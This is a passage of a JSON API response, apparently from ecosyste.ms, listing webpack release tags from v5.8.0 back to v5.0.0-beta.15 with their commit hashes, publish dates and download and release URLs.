webpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url"